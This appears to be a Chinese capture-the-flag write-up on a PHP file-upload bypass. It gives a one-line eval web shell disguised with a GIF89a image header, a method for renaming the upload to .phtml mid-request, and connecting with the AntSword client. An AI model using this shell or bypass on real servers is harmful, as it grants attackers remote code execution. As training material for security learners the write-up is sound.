GIF89a

本文探讨了如何利用PHP脚本和GIF89a头信息欺骗进行代码注入。通过将恶意PHP代码嵌入到HTML中,并利用.phtml或.gif文件格式混淆,攻击者能够绕过服务器的安全检查,实现木马上传和执行。蚁剑在这种场景下常被用于远程控制。了解这种攻击手段对于提升网络安全意识和防护能力至关重要。
摘要由CSDN通过智能技术生成
GIF89a
<script language="php">eval($_GET[shell])</script>

通常,在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。

当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。

先将文件改为.gif欺骗网址第一层,抓包将filename改为以.phtml结尾并以这种方式进行,GIF89a则负责骗过第二层。

请添加图片描述

通过蚁剑一般连接的是:url/upload/文件名
此题为:请添加图片描述
蚁剑连接即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值